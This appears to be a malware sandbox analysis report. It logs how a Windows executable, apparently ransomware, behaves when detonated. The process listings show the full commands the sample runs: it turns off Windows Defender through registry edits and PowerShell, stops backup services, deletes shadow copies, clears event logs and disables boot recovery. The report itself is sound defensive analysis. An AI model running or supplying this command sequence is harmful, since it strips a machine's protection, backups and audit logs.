| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe
"C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\Desktop\ResetCopy.doc"
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Setup.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Setup.exe" -Embedding
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Setup.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Setup.exe" -Embedding
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 2471F11BCFE9CE298581B2318EC712B6
Network
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 4e04a52b484aee0fc50290488e694010 |
| SHA1 | 85a67593fae58158b3183b8c63ca87fdaa59353d |
| SHA256 | 2dd9767036c8ac01daaf6bf6005da9544427816c071264ec0f906a638ad29b88 |
| SHA512 | 93c0517b8c7e052cbf64e722857fd6b62a17d857fbfaa37811face54a85a2c7377ef128c373dc3af51f8d0681ba11beb5c02180d0283787d54242ecc014ed6d5 |
\Program Files (x86)\Common Files\microsoft shared\TextConv\WPFT532.CNV
| MD5 | f44367f4a0bdcc43329d346762ee4667 |
| SHA1 | ab11b6c514f0e31af10601bd4ec65064f3e664f3 |
| SHA256 | ebd6c623da8d3ac9ab1b7a9d9e8a77fb5fa6958728e8b7ce1a2e1c43db9dd058 |
| SHA512 | 8d72e695a169ead03a181c2c2a9e7450fd24564cb7f15a368b44e97638ebf5522d2390be7a3fccee6412bf4754cbc97025d4cfc39dd3a1571c5b41039d29f0c2 |
C:\Users\Admin\Desktop\~$setCopy.doc
| MD5 | b9be1af7c38499ca4e84b0d2cf06d6e8 |
| SHA1 | f545a60f9d46ae915a8b5c04c25f124822c6cc48 |
| SHA256 | 2df9569b22c738ad3ea5fd1ca731be8d9a70f3397ee50b9e0fcca838604a6567 |
| SHA512 | bdb560599564a82fbda5e9b058c28eadb3e9c8aebf0d035bb03a8564d6f0a80cd1323a41fce6f07499a9e2797bcd92d436b315a85b6c57c19f186b06fa4784be |
C:\Program Files (x86)\Microsoft Office\Office14\Document Parts\1033\14\Built-In Building Blocks.dotx.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1
| MD5 | 230f2df42a22d6ee66d0fc015e9606b9 |
| SHA1 | cba72993428c4cffba468f9812e5ffe258e6df73 |
| SHA256 | 09e05f7be5d85dbe92bd7dfce70456b8d81330d0f6a6857a3a15c46cd2a937b3 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-13 13:26
Reported
2022-01-13 13:31
Platform
win10-en-20211208
Max time kernel
32s
Max time network
143s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Drops file in Program Files directory
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe
"C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe"
C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_12ec5" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_12ec5" /y
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_12ec5" start= disabled
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
